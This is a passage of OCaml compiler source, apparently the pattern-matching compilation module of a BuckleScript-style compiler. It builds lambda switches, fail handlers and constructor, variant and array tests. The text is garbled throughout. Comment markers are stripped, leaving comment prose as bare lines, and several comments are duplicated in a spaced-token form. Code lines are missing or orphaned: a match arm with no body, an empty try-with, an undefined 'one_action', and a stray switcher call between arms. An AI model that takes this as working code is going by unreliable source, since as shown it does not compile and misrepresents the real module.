do_tests_nofail loc tst arg rem,
act)
let make_test_sequence loc fail tst lt_tst arg const_lambda_list =
let const_lambda_list = sort_lambda_list const_lambda_list in
let hs,const_lambda_list,fail =
share_actions_tree const_lambda_list fail in
let rec make_test_sequence const_lambda_list =
if List.length const_lambda_list >= 4 && lt_tst <> Pignore then
split_sequence const_lambda_list
else match fail with
| None -> do_tests_nofail loc tst arg const_lambda_list
| Some fail -> do_tests_fail loc fail tst arg const_lambda_list
and split_sequence const_lambda_list =
let list1, list2 =
cut (List.length const_lambda_list / 2) const_lambda_list in
Lifthenelse(Lprim(lt_tst,
[arg; Lconst(Const_base (fst(List.hd list2)))],
loc),
make_test_sequence list1, make_test_sequence list2)
in
hs (make_test_sequence const_lambda_list)
module SArg = struct
type primitive = Lambda.primitive
let eqint = Pintcomp Ceq
let neint = Pintcomp Cneq
let leint = Pintcomp Cle
let ltint = Pintcomp Clt
let geint = Pintcomp Cge
let gtint = Pintcomp Cgt
type act = Lambda.lambda
let make_prim p args = Lprim (p,args,Location.none)
let make_offset arg n = match n with
| 0 -> arg
| _ -> Lprim (Poffsetint n,[arg],Location.none)
let bind arg body =
let newvar,newarg = match arg with
| Lvar v -> v,arg
| _ ->
let newvar = Ident.create "switcher" in
newvar,Lvar newvar in
bind Alias newvar arg (body newarg)
let make_const i = Lconst (Const_base (Const_int i))
let make_isout h arg = Lprim (Pisout, [h ; arg],Location.none)
let make_isin h arg = Lprim (Pnot,[make_isout h arg],Location.none)
let make_if cond ifso ifnot = Lifthenelse (cond, ifso, ifnot)
let make_switch loc arg cases acts ~offset sw_names =
let l = ref [] in
for i = Array.length cases-1 downto 0 do
l := (offset + i,acts.(cases.(i))) :: !l
done ;
Lswitch(arg,
{sw_numconsts = Array.length cases ; sw_consts = !l ;
sw_numblocks = 0 ; sw_blocks = [] ;
sw_failaction = None;
sw_names}, loc)
let make_catch = make_catch_delayed
let make_exit = make_exit
end
Action sharing for Lswitch argument
let share_actions_sw sw =
let store = StoreExp.mk_store () in
let fail = match sw.sw_failaction with
| None -> None
| Some fail ->
Some (store.Switch.act_store_shared fail) in
let consts =
List.map
(fun (i,e) -> i,store.Switch.act_store e)
sw.sw_consts
and blocks =
List.map
(fun (i,e) -> i,store.Switch.act_store e)
sw.sw_blocks in
let acts = store.Switch.act_get_shared () in
let hs,handle_shared = handle_shared () in
let acts = Array.map handle_shared acts in
let fail = match fail with
| None -> None
| Some fail -> Some (acts.(fail)) in
!hs,
{ sw with
sw_consts = List.map (fun (i,j) -> i,acts.(j)) consts ;
sw_blocks = List.map (fun (i,j) -> i,acts.(j)) blocks ;
sw_failaction = fail; }
let reintroduce_fail sw = match sw.sw_failaction with
| None ->
let t = Hashtbl.create 17 in
let seen (_,l) = match as_simple_exit l with
| Some i ->
let old = try Hashtbl.find t i with Not_found -> 0 in
Hashtbl.replace t i (old+1)
| None -> () in
List.iter seen sw.sw_consts ;
List.iter seen sw.sw_blocks ;
let i_max = ref (-1)
and max = ref (-1) in
Hashtbl.iter
(fun i c ->
if c > !max then begin
i_max := i ;
max := c
end) t ;
if !max >= 3 then
let default = !i_max in
let remove ls =
Ext_list.filter ls
(fun (_,lam) -> match as_simple_exit lam with
| Some j -> j <> default
| None -> true) in
{sw with
sw_consts = remove sw.sw_consts ;
sw_blocks = remove sw.sw_blocks ;
sw_failaction = Some (make_exit default)}
else sw
| Some _ -> sw
module Switcher = Switch.Make(SArg)
open Switch
let rec last def = function
| [] -> def
| [x,_] -> x
| _::rem -> last def rem
let get_edges low high l = match l with
| [] -> low, high
| (x,_)::_ -> x, last high l
let as_interval_canfail fail low high l =
let store = StoreExp.mk_store () in
let do_store _tag act =
let i = store.act_store act in
eprintf " STORE [ % s ] % i % s\n " tag i ( string_of_lam act ) ;
eprintf "STORE [%s] %i %s\n" tag i (string_of_lam act) ;
*)
i in
let rec nofail_rec cur_low cur_high cur_act = function
| [] ->
if cur_high = high then
[cur_low,cur_high,cur_act]
else
[(cur_low,cur_high,cur_act) ; (cur_high+1,high, 0)]
| ((i,act_i)::rem) as all ->
let act_index = do_store "NO" act_i in
if cur_high+1= i then
if act_index=cur_act then
nofail_rec cur_low i cur_act rem
else if act_index=0 then
(cur_low,i-1, cur_act)::fail_rec i i rem
else
(cur_low, i-1, cur_act)::nofail_rec i i act_index rem
else if act_index = 0 then
(cur_low, cur_high, cur_act)::
fail_rec (cur_high+1) (cur_high+1) all
else
(cur_low, cur_high, cur_act)::
(cur_high+1,i-1,0)::
nofail_rec i i act_index rem
and fail_rec cur_low cur_high = function
| [] -> [(cur_low, cur_high, 0)]
| (i,act_i)::rem ->
let index = do_store "YES" act_i in
if index=0 then fail_rec cur_low i rem
else
(cur_low,i-1,0)::
nofail_rec i i index rem in
let init_rec = function
| [] -> [low,high,0]
| (i,act_i)::rem ->
let index = do_store "INIT" act_i in
if index=0 then
fail_rec low i rem
else
if low < i then
(low,i-1,0)::nofail_rec i i index rem
else
nofail_rec i i index rem in
fail has action index 0
let r = init_rec l in
Array.of_list r, store
let as_interval_nofail l =
let store = StoreExp.mk_store () in
let rec some_hole = function
| []|[_] -> false
| (i,_)::((j,_)::_ as rem) ->
j > i+1 || some_hole rem in
let rec i_rec cur_low cur_high cur_act = function
| [] ->
[cur_low, cur_high, cur_act]
| (i,act)::rem ->
let act_index = store.act_store act in
if act_index = cur_act then
i_rec cur_low i cur_act rem
else
(cur_low, cur_high, cur_act)::
i_rec i i act_index rem in
let inters = match l with
| (i,act)::rem ->
let act_index =
if some_hole rem then
store.act_store_shared act
else
store.act_store act in
assert (act_index = 0) ;
i_rec i i act_index rem
| _ -> assert false in
Array.of_list inters, store
let sort_int_lambda_list l =
List.sort
(fun (i1,_) (i2,_) ->
if i1 < i2 then -1
else if i2 < i1 then 1
else 0)
l
let as_interval fail low high l =
let l = sort_int_lambda_list l in
get_edges low high l,
(match fail with
| None -> as_interval_nofail l
| Some act -> as_interval_canfail act low high l)
let call_switcher loc fail arg low high int_lambda_list sw_names =
let edges, (cases, actions) =
as_interval fail low high int_lambda_list in
Switcher.zyva loc edges arg cases actions sw_names
let rec list_as_pat = function
| [] -> fatal_error "Matching.list_as_pat"
| [pat] -> pat
| pat::rem ->
{pat with pat_desc = Tpat_or (pat,list_as_pat rem,None)}
let complete_pats_constrs = function
| p::_ as pats ->
List.map
(pat_of_constr p)
(complete_constrs p (List.map get_key_constr pats))
| _ -> assert false
Following two ` ` failaction '' function compute n , the trap handler
to jump to in case of failure of elementary tests
Following two ``failaction'' function compute n, the trap handler
to jump to in case of failure of elementary tests
*)
let mk_failaction_neg partial ctx def = match partial with
| Partial ->
begin match def with
| (_,idef)::_ ->
Some (Lstaticraise (idef,[])),jumps_singleton idef ctx
| [] ->
None, jumps_empty
end
| Total ->
None, jumps_empty
let mk_failaction_pos partial seen ctx defs =
if dbg then begin
prerr_endline "**POS**" ;
pretty_def defs ;
()
end ;
let rec scan_def env to_test defs = match to_test,defs with
| ([],_)|(_,[]) ->
List.fold_left
(fun (klist,jumps) (pats,i)->
let action = Lstaticraise (i,[]) in
let klist =
List.fold_right
(fun pat r -> (get_key_constr pat,action)::r)
pats klist
and jumps =
jumps_add i (ctx_lub (list_as_pat pats) ctx) jumps in
klist,jumps)
([],jumps_empty) env
| _,(pss,idef)::rem ->
let now, later =
List.partition
(fun (_p,p_ctx) -> ctx_match p_ctx pss) to_test in
match now with
| [] -> scan_def env to_test rem
| _ -> scan_def ((List.map fst now,idef)::env) later rem in
let fail_pats = complete_pats_constrs seen in
if List.length fail_pats < 32 then begin
let fail,jmps =
scan_def
[]
(List.map
(fun pat -> pat, ctx_lub pat ctx)
fail_pats)
defs in
if dbg then begin
eprintf "POSITIVE JUMPS [%i]:\n" (List.length fail_pats);
pretty_jumps jmps
end ;
None,fail,jmps
if dbg then eprintf "POS->NEG!!!\n%!" ;
let fail,jumps = mk_failaction_neg partial ctx defs in
if dbg then
eprintf "FAIL: %s\n"
(match fail with
| None -> "<none>"
| Some lam -> string_of_lam lam) ;
fail,[],jumps
end
let combine_constant names loc arg cst partial ctx def
(const_lambda_list, total, _pats) =
let fail, local_jumps =
mk_failaction_neg partial ctx def in
let lambda1 =
match cst with
| Const_int _ ->
let int_lambda_list =
List.map (function Const_int n, l -> n,l | _ -> assert false)
const_lambda_list in
call_switcher loc fail arg min_int max_int int_lambda_list names
| Const_char _ ->
let int_lambda_list =
List.map (function Const_char c, l -> (c, l)
| _ -> assert false)
const_lambda_list in
call_switcher loc fail arg 0 max_int int_lambda_list names
| Const_string _ ->
let const_lambda_list = sort_lambda_list const_lambda_list in
let sw =
List.map
(fun (c,act) -> match c with
| Const_string (s,_) -> s,act
| _ -> assert false)
const_lambda_list in
let hs,sw,fail = share_actions_tree sw fail in
hs (Lstringswitch (arg,sw,fail,loc))
| Const_float _ ->
make_test_sequence loc
fail
(Pfloatcomp Cneq) (Pfloatcomp Clt)
arg const_lambda_list
| Const_int32 _ ->
make_test_sequence loc
fail
(Pbintcomp(Pint32, Cneq)) (Pbintcomp(Pint32, Clt))
arg const_lambda_list
| Const_int64 _ ->
make_test_sequence loc
fail
(Pbintcomp(Pint64, Cneq)) (Pbintcomp(Pint64, Clt))
arg const_lambda_list
| Const_nativeint _ ->
make_test_sequence loc
fail
(Pbintcomp(Pnativeint, Cneq)) (Pbintcomp(Pnativeint, Clt))
arg const_lambda_list
in lambda1,jumps_union local_jumps total
let split_cases tag_lambda_list =
let rec split_rec = function
[] -> ([], [])
| (cstr, act) :: rem ->
let (consts, nonconsts) = split_rec rem in
match cstr with
Cstr_constant n -> ((n, act) :: consts, nonconsts)
| Cstr_block n -> (consts, (n, act) :: nonconsts)
| Cstr_unboxed -> (consts, (0, act) :: nonconsts)
| Cstr_extension _ -> assert false in
let const, nonconst = split_rec tag_lambda_list in
sort_int_lambda_list const,
sort_int_lambda_list nonconst
let split_variant_cases tag_lambda_list =
let rec split_rec = function
[] -> ([], [])
| ((name,cstr), act) :: rem ->
let (consts, nonconsts) = split_rec rem in
match cstr with
Cstr_constant n -> ((n, (name, act)) :: consts, nonconsts)
| Cstr_block n -> (consts, (n, (name, act)) :: nonconsts)
| Cstr_unboxed -> assert false
| Cstr_extension _ -> assert false in
let const, nonconst = split_rec tag_lambda_list in
sort_int_lambda_list const,
sort_int_lambda_list nonconst
let split_extension_cases tag_lambda_list =
let rec split_rec = function
[] -> ([], [])
| (cstr, act) :: rem ->
let (consts, nonconsts) = split_rec rem in
match cstr with
Cstr_extension(path, true) when not !Config.bs_only -> ((path, act) :: consts, nonconsts)
| Cstr_extension(path, _) -> (consts, (path, act) :: nonconsts)
| _ -> assert false in
split_rec tag_lambda_list
let extension_slot_eq =
Pccall (Primitive.simple ~name:"#extension_slot_eq" ~arity:2 ~alloc:false)
let combine_constructor sw_names loc arg ex_pat cstr partial ctx def
(tag_lambda_list, total1, pats) =
if cstr.cstr_consts < 0 then begin
let fail, local_jumps =
mk_failaction_neg partial ctx def in
let lambda1 =
let consts, nonconsts = split_extension_cases tag_lambda_list in
let default, consts, nonconsts =
match fail with
| None ->
begin match consts, nonconsts with
| _, (_, act)::rem -> act, consts, rem
| (_, act)::rem, _ -> act, rem, nonconsts
| _ -> assert false
end
| Some fail -> fail, consts, nonconsts in
let nonconst_lambda =
match nonconsts with
[] -> default
| _ ->
let tag = Ident.create "tag" in
let tests =
List.fold_right
(fun (path, act) rem ->
let ext = transl_extension_path ex_pat.pat_env path in
Lifthenelse(Lprim(extension_slot_eq , [Lvar tag; ext], loc),
act, rem))
nonconsts
default
in
Llet(Alias, Pgenval,tag, arg, tests)
in
List.fold_right
(fun (path, act) rem ->
let ext = transl_extension_path ex_pat.pat_env path in
Lifthenelse(Lprim(extension_slot_eq , [arg; ext], loc),
act, rem))
consts
nonconst_lambda
in
lambda1, jumps_union local_jumps total1
end else begin
let ncases = List.length tag_lambda_list
and nconstrs = cstr.cstr_consts + cstr.cstr_nonconsts in
let sig_complete = ncases = nconstrs in
let fail_opt,fails,local_jumps =
if sig_complete then None,[],jumps_empty
else
mk_failaction_pos partial pats ctx def in
let tag_lambda_list = fails @ tag_lambda_list in
let (consts, nonconsts) = split_cases tag_lambda_list in
let lambda1 =
match fail_opt,same_actions tag_lambda_list with
| _ ->
match
(cstr.cstr_consts, cstr.cstr_nonconsts, consts, nonconsts)
with
| (1, 1, [0, act1], [0, act2]) ->
let arg =
if !Config.bs_only && Datarepr.constructor_has_optional_shape cstr then
Lprim(is_not_none_bs_primitve , [arg], loc)
else arg
in
Lifthenelse(arg, act2, act1)
| (2,0, [(i1,act1); (_,act2)],[]) ->
if i1 = 0 then Lifthenelse(arg, act2, act1)
else Lifthenelse (arg,act1,act2)
call_switcher loc fail_opt arg 0 (n-1) consts sw_names
| (n, _, _, _) ->
let act0 =
match fail_opt,nonconsts with
| Some a,[] -> Some a
| Some _,_ ->
if List.length nonconsts = cstr.cstr_nonconsts then
same_actions nonconsts
else None
| None,_ -> same_actions nonconsts in
match act0 with
| Some act ->
Lifthenelse
(Lprim (Pisint, [arg], loc),
call_switcher loc
fail_opt arg
0 (n-1) consts sw_names,
act)
| None ->
let sw =
{sw_numconsts = cstr.cstr_consts; sw_consts = consts;
sw_numblocks = cstr.cstr_nonconsts; sw_blocks = nonconsts;
sw_failaction = fail_opt;
sw_names} in
let hs,sw = share_actions_sw sw in
let sw = reintroduce_fail sw in
hs (Lswitch (arg,sw,loc)) in
lambda1, jumps_union local_jumps total1
end
let make_test_sequence_variant_constant fail arg int_lambda_list =
let _, (cases, actions) =
as_interval fail min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) in
Switcher.test_sequence arg cases actions
let call_switcher_variant_constant loc fail arg int_lambda_list names =
call_switcher loc fail arg min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names
let call_switcher_variant_constr loc fail arg int_lambda_list names =
let v = Ident.create "variant" in
Llet(Alias, Pgenval, v, Lprim(Pfield (0, Fld_poly_var_tag), [arg], loc),
call_switcher loc
fail (Lvar v) min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names)
let call_switcher_variant_constant :
(Location.t ->
Lambda.lambda option ->
Lambda.lambda ->
(int * (string * Lambda.lambda)) list ->
Lambda.switch_names option ->
Lambda.lambda)
ref= ref call_switcher_variant_constant
let call_switcher_variant_constr :
(Location.t ->
Lambda.lambda option ->
Lambda.lambda ->
(int * (string * Lambda.lambda)) list ->
Lambda.switch_names option ->
Lambda.lambda)
ref
= ref call_switcher_variant_constr
let make_test_sequence_variant_constant :
(Lambda.lambda option ->
Lambda.lambda ->
(int * (string * Lambda.lambda)) list ->
Lambda.lambda)
ref
= ref make_test_sequence_variant_constant
let combine_variant names loc row arg partial ctx def
(tag_lambda_list, total1, _pats) =
let row = Btype.row_repr row in
let num_constr = ref 0 in
if row.row_closed then
List.iter
(fun (_, f) ->
match Btype.row_field_repr f with
Rabsent | Reither(true, _::_, _, _) -> ()
| _ -> incr num_constr)
row.row_fields
else
num_constr := max_int;
let test_int_or_block arg if_int if_block =
if !Config.bs_only then
Lifthenelse(Lprim (Pccall(Primitive.simple ~name:"#is_poly_var_block" ~arity:1 ~alloc:false), [arg], loc), if_block, if_int)
else
Lifthenelse(Lprim (Pisint, [arg], loc), if_int, if_block) in
let sig_complete = List.length tag_lambda_list = !num_constr
let fail, local_jumps =
if
sig_complete || (match partial with Total -> true | _ -> false)
then
None, jumps_empty
else
mk_failaction_neg partial ctx def in
let (consts, nonconsts) = split_variant_cases tag_lambda_list in
let lambda1 = match fail, one_action with
| None, Some act -> act
| _,_ ->
match (consts, nonconsts) with
| ([_, (_,act1)], [_, (_,act2)]) when fail=None ->
test_int_or_block arg act1 act2
!make_test_sequence_variant_constant fail arg consts
| ([], _) ->
let lam = !call_switcher_variant_constr loc
fail arg nonconsts names in
begin match fail with
| None -> lam
| Some fail -> test_int_or_block arg fail lam
end
| (_, _) ->
let lam_const =
!call_switcher_variant_constant loc
fail arg consts names
and lam_nonconst =
!call_switcher_variant_constr loc
fail arg nonconsts names in
test_int_or_block arg lam_const lam_nonconst
in
lambda1, jumps_union local_jumps total1
let combine_array names loc arg partial ctx def
(len_lambda_list, total1, _pats) =
let fail, local_jumps = mk_failaction_neg partial ctx def in
let lambda1 =
let newvar = Ident.create "len" in
let switch =
call_switcher loc
fail (Lvar newvar)
0 max_int len_lambda_list names in
bind
Alias newvar (Lprim(Parraylength , [arg], loc)) switch in
lambda1, jumps_union local_jumps total1
let [@inline] event_branch _repr lam = lam
This exception is raised when the compiler can not produce code
because control can not reach the compiled clause ,
Unused is raised initially in compile_test .
compile_list ( for compiling switch results ) catch Unused
comp_match_handlers ( for compiling splitted matches )
may Unused
This exception is raised when the compiler cannot produce code
because control cannot reach the compiled clause,
Unused is raised initially in compile_test.
compile_list (for compiling switch results) catch Unused
comp_match_handlers (for compiling splitted matches)
may reraise Unused
*)
exception Unused
let compile_list compile_fun division =
let rec c_rec totals = function
| [] -> [], jumps_unions totals, []
| (key, cell) :: rem ->
begin match cell.ctx with
| [] -> c_rec totals rem
| _ ->
try
let (lambda1, total1) = compile_fun cell.ctx cell.pm in
let c_rem, total, new_pats =
c_rec
(jumps_map ctx_combine total1::totals) rem in
((key,lambda1)::c_rem), total, (cell.pat::new_pats)
with
| Unused -> c_rec totals rem
end in
c_rec [] division
let compile_orhandlers compile_fun lambda1 total1 ctx to_catch =
let rec do_rec r total_r = function
| [] -> r,total_r
| (mat,i,vars,pm)::rem ->
begin try
let ctx = select_columns mat ctx in
let handler_i, total_i =
compile_fun ctx pm in
match raw_action r with
| Lstaticraise (j,args) ->
if i=j then
List.fold_right2 (bind Alias) vars args handler_i,
jumps_map (ctx_rshift_num (ncols mat)) total_i
else
do_rec r total_r rem
| _ ->
do_rec
(Lstaticcatch (r,(i,vars), handler_i))
(jumps_union
(jumps_remove i total_r)
(jumps_map (ctx_rshift_num (ncols mat)) total_i))
rem
with
| Unused ->
do_rec (Lstaticcatch (r, (i,vars), lambda_unit)) total_r rem
end in
do_rec lambda1 total1 to_catch
let compile_test compile_fun partial divide combine ctx to_match =
let division = divide ctx to_match in
let c_div = compile_list compile_fun division in
match c_div with
| [],_,_ ->
begin match mk_failaction_neg partial ctx to_match.default with
| None,_ -> raise Unused
| Some l,total -> l,total
end
| _ ->
combine ctx to_match.default c_div
let rec approx_present v = function
| Lconst _ -> false
| Lstaticraise (_,args) ->
List.exists (fun lam -> approx_present v lam) args
| Lprim (_,args,_) ->
List.exists (fun lam -> approx_present v lam) args
| Llet (Alias, _k, _, l1, l2) ->
approx_present v l1 || approx_present v l2
| Lvar vv -> Ident.same v vv
| _ -> true
let rec lower_bind v arg lam = match lam with
| Lifthenelse (cond, ifso, ifnot) ->
let pcond = approx_present v cond
and pso = approx_present v ifso
and pnot = approx_present v ifnot in
begin match pcond, pso, pnot with
| false, false, false -> lam
| false, true, false ->
Lifthenelse (cond, lower_bind v arg ifso, ifnot)
| false, false, true ->
Lifthenelse (cond, ifso, lower_bind v arg ifnot)
| _,_,_ -> bind Alias v arg lam
end
| Lswitch (ls,({sw_consts=[i,act] ; sw_blocks = []} as sw), loc)
when not (approx_present v ls) ->
Lswitch (ls, {sw with sw_consts = [i,lower_bind v arg act]}, loc)
| Lswitch (ls,({sw_consts=[] ; sw_blocks = [i,act]} as sw), loc)
when not (approx_present v ls) ->
Lswitch (ls, {sw with sw_blocks = [i,lower_bind v arg act]}, loc)
| Llet (Alias, k, vv, lv, l) ->
if approx_present v lv then
bind Alias v arg lam
else
Llet (Alias, k, vv, lv, lower_bind v arg l)
| Lvar u when Ident.same u v && Ident.name u = "*sth*" ->
| _ ->
bind Alias v arg lam
let bind_check str v arg lam = match str,arg with
| _, Lvar _ ->bind str v arg lam
| Alias,_ -> lower_bind v arg lam
| _,_ -> bind str v arg lam
let comp_exit ctx m = match m.default with
| (_,i)::_ -> Lstaticraise (i,[]), jumps_singleton i ctx
| _ -> fatal_error "Matching.comp_exit"
let rec comp_match_handlers comp_fun partial ctx arg first_match next_matchs =
match next_matchs with
| [] -> comp_fun partial ctx arg first_match
| rem ->
let rec c_rec body total_body = function
| [] -> body, total_body
| (i,pm)::rem ->
let ctx_i,total_rem = jumps_extract i total_body in
begin match ctx_i with
| [] -> c_rec body total_body rem
| _ ->
try
let li,total_i =
comp_fun
(match rem with [] -> partial | _ -> Partial)
ctx_i arg pm in
c_rec
(Lstaticcatch (body,(i,[]),li))
(jumps_union total_i total_rem)
rem
with
| Unused ->
c_rec (Lstaticcatch (body,(i,[]),lambda_unit))
total_rem rem
end in
try
let first_lam,total = comp_fun Partial ctx arg first_match in
c_rec first_lam total rem
with Unused -> match next_matchs with
| [] -> raise Unused
| (_,x)::xs -> comp_match_handlers comp_fun partial ctx arg x xs
let rec name_pattern default = function
(pat :: _, _) :: rem ->
begin match Typecore.id_of_pattern pat with
| Some id -> id
| None -> name_pattern default rem
end
| _ -> Ident.create default
let arg_to_var arg cls = match arg with
| Lvar v -> v,arg
| _ ->
let v = name_pattern "match" cls in
v,Lvar v
let names_from_construct_pattern : (pattern -> switch_names option) ref =
ref (fun _ -> None)
The main compilation function .
Input :
repr = used for inserting debug events
partial = exhaustiveness information from Parmatch
ctx = a context
m = a pattern matching
Output : a lambda term , a jump summary { ... , exit number - > context , .. }
The main compilation function.
Input:
repr=used for inserting debug events
partial=exhaustiveness information from Parmatch
ctx=a context
m=a pattern matching
Output: a lambda term, a jump summary {..., exit number -> context, .. }
*)
let rec compile_match repr partial ctx m = match m with
| { cases = []; args = [] } -> comp_exit ctx m
| { cases = ([], action) :: rem } ->
if is_guarded action then begin
let (lambda, total) =
compile_match None partial ctx { m with cases = rem } in
event_branch repr (patch_guarded lambda action), total
end else
(event_branch repr action, jumps_empty)
| { args = (arg, str)::argl } ->
let v,newarg = arg_to_var arg m.cases in
let first_match,rem =
split_precompile (Some v)
{ m with args = (newarg, Alias) :: argl } in
let (lam, total) =
comp_match_handlers
((if dbg then do_compile_matching_pr else do_compile_matching) repr)
partial ctx newarg first_match rem in
bind_check str v arg lam, total
| _ -> assert false
and do_compile_matching_pr repr partial ctx arg x =
prerr_string "COMPILE: " ;
prerr_endline (match partial with Partial -> "Partial" | Total -> "Total") ;
prerr_endline "MATCH" ;
pretty_precompiled x ;
prerr_endline "CTX" ;
pretty_ctx ctx ;
let (_, jumps) as r = do_compile_matching repr partial ctx arg x in
prerr_endline "JUMPS" ;
pretty_jumps jumps ;
r
and do_compile_matching repr partial ctx arg pmh = match pmh with
| Pm pm ->
let pat = what_is_cases pm.cases in
begin match pat.pat_desc with
| Tpat_any ->
compile_no_test
divide_var ctx_rshift repr partial ctx pm
| Tpat_tuple patl ->
compile_no_test
(divide_tuple (List.length patl) (normalize_pat pat)) ctx_combine
repr partial ctx pm
| Tpat_record ((_, lbl,_)::_,_) ->
compile_no_test
(divide_record lbl.lbl_all (normalize_pat pat))
ctx_combine repr partial ctx pm
| Tpat_constant cst ->
let names = None in
compile_test
(compile_match repr partial) partial
divide_constant
(combine_constant names pat.pat_loc arg cst partial)
ctx pm
| Tpat_construct (_, cstr, _) ->
let sw_names = !names_from_construct_pattern pat in
compile_test
(compile_match repr partial) partial
divide_constructor
(combine_constructor sw_names pat.pat_loc arg pat cstr partial)
ctx pm
| Tpat_array _ ->
let names = None in
compile_test (compile_match repr partial) partial
divide_array (combine_array names pat.pat_loc arg partial)
ctx pm
| Tpat_lazy _ ->
compile_no_test
(divide_lazy (normalize_pat pat))
ctx_combine repr partial ctx pm
| Tpat_variant(_, _, row) ->
let names = None in
compile_test (compile_match repr partial) partial
(divide_variant !row)
(combine_variant names pat.pat_loc !row arg partial)
ctx pm
| _ -> assert false
end
| PmVar {inside=pmh ; var_arg=arg} ->
let lam, total =
do_compile_matching repr partial (ctx_lshift ctx) arg pmh in
lam, jumps_map ctx_rshift total
| PmOr {body=body ; handlers=handlers} ->
let lam, total = compile_match repr partial ctx body in
compile_orhandlers (compile_match repr partial) lam total ctx handlers
and compile_no_test divide up_ctx repr partial ctx to_match =
let {pm=this_match ; ctx=this_ctx } = divide ctx to_match in
let lambda,total = compile_match repr partial this_ctx this_match in
lambda, jumps_map up_ctx total
If there is a guard in a matching or a lazy pattern ,
then set exhaustiveness info to Partial .
( because of side effects , assume the worst ) .
Notice that exhaustiveness information is trusted by the compiler ,
that is , a match flagged as Total should not fail at runtime .
More specifically , for instance if match y with x : : _ - > x is flagged
total ( as it happens during JoCaml compilation ) then y can not be [ ]
at runtime . As a consequence , the static Total exhaustiveness information
have to be downgraded to Partial , in the dubious cases where guards
or lazy pattern execute arbitrary code that may perform side effects
and change the subject values .
LM :
Lazy pattern was PR#5992 , initial patch by lpw25 .
I have generalized the patch , so as to also find mutable fields .
If there is a guard in a matching or a lazy pattern,
then set exhaustiveness info to Partial.
(because of side effects, assume the worst).
Notice that exhaustiveness information is trusted by the compiler,
that is, a match flagged as Total should not fail at runtime.
More specifically, for instance if match y with x::_ -> x is flagged
total (as it happens during JoCaml compilation) then y cannot be []
at runtime. As a consequence, the static Total exhaustiveness information
have to be downgraded to Partial, in the dubious cases where guards
or lazy pattern execute arbitrary code that may perform side effects
and change the subject values.
LM:
Lazy pattern was PR#5992, initial patch by lpw25.
I have generalized the patch, so as to also find mutable fields.
*)
let find_in_pat pred =
let rec find_rec p =
pred p.pat_desc ||
begin match p.pat_desc with
| Tpat_alias (p,_,_) | Tpat_variant (_,Some p,_) | Tpat_lazy p ->
find_rec p
| Tpat_tuple ps|Tpat_construct (_,_,ps) | Tpat_array ps ->
List.exists find_rec ps
| Tpat_record (lpats,_) ->
List.exists
(fun (_, _, p) -> find_rec p)
lpats
| Tpat_or (p,q,_) ->
find_rec p || find_rec q
| Tpat_constant _ | Tpat_var _
| Tpat_any | Tpat_variant (_,None,_) -> false
end in
find_rec
let is_lazy_pat = function
| Tpat_lazy _ -> true
| Tpat_alias _ | Tpat_variant _ | Tpat_record _
| Tpat_tuple _|Tpat_construct _ | Tpat_array _
| Tpat_or _ | Tpat_constant _ | Tpat_var _ | Tpat_any
-> false
let is_lazy p = find_in_pat is_lazy_pat p
let have_mutable_field p = match p with
| Tpat_record (lps,_) ->
List.exists
(fun (_,lbl,_) ->
match lbl.Types.lbl_mut with
| Mutable -> true
| Immutable -> false)
lps
| Tpat_alias _ | Tpat_variant _ | Tpat_lazy _
| Tpat_tuple _|Tpat_construct _ | Tpat_array _
| Tpat_or _
| Tpat_constant _ | Tpat_var _ | Tpat_any
-> false
let is_mutable p = find_in_pat have_mutable_field p
let check_partial is_mutable is_lazy pat_act_list = function
| Partial -> Partial
| Total ->
if
List.exists
(fun (pats, lam) ->
is_mutable pats && (is_guarded lam || is_lazy pats))
pat_act_list
then Partial
else Total
let check_partial_list =
check_partial (List.exists is_mutable) (List.exists is_lazy)
let check_partial = check_partial is_mutable is_lazy
let start_ctx n = [{left=[] ; right = omegas n}]
let check_total total lambda i handler_fun =
if jumps_is_empty total then
lambda
else begin
Lstaticcatch(lambda, (i,[]), handler_fun())
end
let compile_matching repr handler_fun arg pat_act_list partial =
let partial = check_partial pat_act_list partial in
match partial with
| Partial ->
let raise_num = next_raise_count () in
let pm =
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [arg, Strict] ;
default = [[[omega]],raise_num]} in
begin try
let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
check_total total lambda raise_num handler_fun
with
end
| Total ->
let pm =
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [arg, Strict] ;
default = []} in
let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
assert (jumps_is_empty total) ;
lambda
let partial_function loc () =
let (fname, line, char) = Location.get_pos_info loc.Location.loc_start in
let fname =
Filename.basename fname
in
Lprim(Praise Raise_regular, [Lprim(Pmakeblock(Blk_extension),
[transl_normal_path Predef.path_match_failure;
Lconst(Const_block(Blk_tuple,
[Const_base(Const_string (fname, None));
Const_base(Const_int line);
Const_base(Const_int char)]))], loc)], loc)
let for_function loc repr param pat_act_list partial =
compile_matching repr (partial_function loc) param pat_act_list partial
In the following two cases , exhaustiveness info is not available !
let for_trywith param pat_act_list =
compile_matching None
(fun () -> Lprim(Praise Raise_reraise, [param], Location.none))
param pat_act_list Partial
let simple_for_let loc param pat body =
compile_matching None (partial_function loc) param [pat, body] Partial
Optimize binding of immediate tuples
The goal of the implementation of ' for_let ' below , which replaces
' simple_for_let ' , is to avoid tuple allocation in cases such as
this one :
let ( x , y ) =
let foo = ... in
if foo then ( 1 , 2 ) else ( 3,4 )
in bar
The compiler easily optimizes the simple ` let ( x , y ) = ( 1,2 ) in ... `
case ( call to Matching.for_multiple_match from Translcore ) , but
did n't optimize situations where the rhs tuples are hidden under
a more complex context .
The idea comes from who suggested and implemented
the following compilation method , based on :
let x = dummy in let y = dummy in
begin
let foo = ... in
if foo then
( let x1 = 1 in let y1 = 2 in x < - x1 ; y < - y1 )
else
( let x2 = 3 in let y2 = 4 in x < - x2 ; y < - y2 )
end ;
bar
The current implementation from uses Lstaticcatch /
Lstaticraise instead :
catch
let foo = ... in
if foo then
( let x1 = 1 in let y1 = 2 in exit x1 y1 )
else
( let x2 = 3 in let y2 = 4 in exit x2 y2 )
with x y - >
bar
The catch / exit is used to avoid duplication of the let body ( ' bar '
in the example ) , on ' if ' branches for example ; it is useless for
linear contexts such as ' let ' , but we do n't need to be careful to
generate nice code because Simplif will remove such useless
catch / exit .
The goal of the implementation of 'for_let' below, which replaces
'simple_for_let', is to avoid tuple allocation in cases such as
this one:
let (x,y) =
let foo = ... in
if foo then (1, 2) else (3,4)
in bar
The compiler easily optimizes the simple `let (x,y) = (1,2) in ...`
